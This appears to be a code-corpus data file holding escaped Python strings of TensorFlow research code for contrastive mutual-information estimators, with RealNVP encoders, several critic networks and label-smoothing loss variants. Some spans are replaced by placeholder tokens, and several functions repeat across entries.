_validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. (2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, 